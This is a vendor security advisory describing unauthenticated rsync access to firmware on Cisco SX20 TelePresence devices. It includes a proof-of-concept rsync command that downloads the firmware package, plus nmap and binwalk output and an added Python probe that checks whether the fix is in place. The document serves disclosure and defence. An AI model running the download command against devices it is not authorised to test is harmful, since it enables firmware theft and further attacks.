usd-2018-0035 | Cisco Unified Communications Manager (CallManager)/11.5.1.15900-18 (likely in all versions)

Advisory ID: usd-2018-0035
CVE Number: N/A
Affected Product: Unified Communications Manager
Affected Version: 11.5.1.15900-18 (likely in all versions)
Vulnerability Type: Exposure of Sensitive Configuration Data
Security Risk: Medium
Vendor URL: https://www.cisco.com
Vendor Status: „is not considered to be an exposure“

Description

usd discovered that Cisco SX20 devices allow attackers on the local network to download firmware using rsync without prior authentication. Access to the firmware enables attackers to specifically search for additional vulnerabilities within source code and configuration files.

The Cisco SX20 TelePresence Quick Set is a set of devices used for video conferencing. Typically they are paired with a screen (e.g. a TV). The SX20 needs to connect to a local network to handle calls and to exchange configuration data with the back-end (e.g. the Cisco UCM CallManager). This exposes the device to attackers on the local network.

Proof of Concept

Let 10.10.10.10 be the IP address of a SX20 device.

An nmap scan identifies the following open services:

4043/tcp  open  rsync           (protocol version 29)
4045/tcp  open  lockd?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, HTTPOptions, Kerberos, LPDString, NULL, TLSSessionReq, TerminalServer:
|     version: ce9.4.1 6ae80e1f2ee 2018-08-14
|     method: rsync
|     url: rsync://[::ffff:10.10.10.10]:4043/idefix/idefix.pkg
|_    targets: 102300-3,102310-0,102310-1,101282-0

The following command will download the idefix.pkg file advertised by TCP port 4045:
# rsync rsync://[::ffff:10.10.10.10]:4043/idefix/idefix.pkg .

Using binwalk, the file is identified as a firmware package:
# binwalk idefix.pkg

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
3487          0xD9F           PEM certificate
7324          0x1C9C          Executable script, shebang: "/bin/sh"
13549         0x34ED          Unix path: /sys/class/i2c-adapter/i2c-4/4-0054/eeprom@101:16
13613         0x352D          Unix path: /sys/class/i2c-adapter/i2c-4/4-0054/eeprom@96:5
13672         0x3568          Unix path: /sys/class/gpio/gpio137/value
13808         0x35F0          Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 44345388 bytes, 5207 inodes, blocksize: 131072 bytes, created: 2018-08-14 13:16:20
44361273      0x2A4E639       uImage header, header size: 64 bytes, header CRC: 0x850DC982, created: 2018-01-22 11:38:34, image size: 210044 bytes, Data Address: 0x80E80000, Entry Point: 0x80E80000, data CRC: 0xEEA65CCC, OS: Firmware, CPU: ARM, image type: Firmware Image, compression type: none, image name: "CISCO firmware 32"
44496781      0x2A6F78D       CRC32 polynomial table, little endian
44505174      0x2A71856       Android bootimg, kernel size: 1684103680 bytes, kernel addr: 0x616D6920, ramdisk size: 1830839655 bytes, ramdisk addr: 0x63696761, product name: "oo long"
44607241      0x2A8A709       CRC32 polynomial table, little endian
44612405      0x2A8BB35       uImage header, header size: 64 bytes, header CRC: 0xC37A01BA, created: 2018-06-05 12:33:35, image size: 20337280 bytes, Data Address: 0x0, Entry Point: 0x0, data CRC: 0xFCCAACDC, OS: Linux, CPU: ARM, image type: RAMDisk Image, compression type: gzip, image name: "CISCO ramdisk 20180605-3a15e0444CertISW"
44613317      0x2A8BEC5       gzip compressed data, from Unix, last modified: 2018-06-05 12:33:25
64949749      0x3DF0DF5       uImage header, header size: 64 bytes, header CRC: 0x1D587465, created: 2018-06-05 12:33:41, image size: 3791880 bytes, Data Address: 0x80008000, Entry Point: 0x80008000, data CRC: 0xC48327A1, OS: Linux, CPU: ARM, image type: OS Kernel Image, compression type: none, image name: "CISCO kernel 20180605-3a15e04445CertISW"
64967148      0x3DF51EC       gzip compressed data, maximum compression, from Unix, NULL date (1970-01-01 00:00:00)
68741741      0x418EA6D       Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 20941005 bytes, 878 inodes, blocksize: 131072 bytes, created: 2018-06-05 12:51:34
89684647      0x5587AA7       Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 553758 bytes, 192 inodes, blocksize: 131072 bytes, created: 2018-08-14 13:10:39

Please note that at the time of this writing, usd AG has not performed any additional firmware analysis.

Fix

Enable authentication for the rsync service or disable it if possible.
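Added example (not usd AG's code) for checking whether the fix is in place: it parses the banner nmap printed on TCP 4045 to find the rsync URL, then opens the module the way an rsync client would and reports whether the daemon answers "@RSYNCD: OK" (no credentials asked) or "@RSYNCD: AUTHREQD" (authentication enforced); the sample banner is a constructed copy of the one above, and no file is transferred.

```python
"""Added defender check (not usd AG's code): does the rsync daemon advertised
by an SX20 hand out its firmware module without credentials?"""
import re
import socket
from urllib.parse import urlparse

# Constructed copy of the banner nmap printed on TCP 4045 in the advisory.
SAMPLE_BANNER = (
    "version: ce9.4.1 6ae80e1f2ee 2018-08-14\n"
    "method: rsync\n"
    "url: rsync://[::ffff:10.10.10.10]:4043/idefix/idefix.pkg\n"
    "targets: 102300-3,102310-0,102310-1,101282-0\n"
)

def parse_banner(text):
    """Split the 'key: value' banner and break its rsync URL into host, port
    and module name, which is all the daemon probe below needs."""
    fields = dict(re.findall(r"^(\w+):\s*(.*)$", text, re.M))
    url = urlparse(fields["url"])
    host = url.hostname                      # brackets stripped by urlparse
    if host.startswith("::ffff:"):           # IPv4-mapped address -> plain IPv4
        host = host[len("::ffff:"):]
    fields.update(host=host, port=url.port or 873,
                  module=url.path.strip("/").split("/")[0])
    return fields

def classify_reply(reply):
    """Map the daemon's answer to a module request onto a verdict. Per the
    rsync daemon protocol, MOTD lines may precede the status line."""
    for line in reply.decode(errors="replace").splitlines():
        if line.startswith("@RSYNCD: OK"):
            return "unauthenticated"         # module opened with no credentials
        if line.startswith("@RSYNCD: AUTHREQD"):
            return "auth-required"           # daemon sent an auth challenge
        if line.startswith("@ERROR"):
            return "denied"                  # unknown module, host denied, ...
    return "unknown"

def probe_module(host, port, module, timeout=5):
    """Open the module exactly as an rsync client would and classify the reply.
    Nothing is transferred: we stop right after the daemon's status line."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        if not sock.recv(64).startswith(b"@RSYNCD:"):   # e.g. b'@RSYNCD: 29\n'
            return "unknown"
        sock.sendall(b"@RSYNCD: 29\n")                  # our protocol version
        sock.sendall(module.encode() + b"\n")           # request the module
        return classify_reply(sock.recv(512))
```

Run `probe_module(**{k: v for k, v in parse_banner(SAMPLE_BANNER).items() if k in ("host", "port", "module")})` against your own device; anything other than "auth-required" or "denied" means the module is still open.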

Timeline

  • 2018-10-31 Advisory has been sent to psirt@cisco.com
  • 2018-11-07 Cisco states that they do not consider this to be an exposure
  • 2018-11-09 Public disclosure deadline extended to 2019-01-23
  • 2019-01-23 Security advisory released

Credits

This security vulnerability was discovered by Marcus Gruber and Maximilian Boehner of usd AG.

ABOUT usd SECURITY ADVISORIES

In order to protect businesses against hackers and criminals, we always have to keep our skills and knowledge up to date. Thus, security research is just as important for our work as is building up a security community to promote the exchange of knowledge. After all, more security can only be achieved if many individuals take on the task.

Our CST Academy and our usd HeroLab are essential parts of our security mission. We share the knowledge we gain in our practical work and our research through training courses and publications. In this context, the usd HeroLab publishes a series of papers on new vulnerabilities and current security issues.

Always for the sake of our mission: „more security.“

In accordance with usd AG’s Responsible Disclosure Policy, all vendors have been notified of the existence of these vulnerabilities.

Disclaimer

The information provided in this security advisory is provided „as is“ and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible.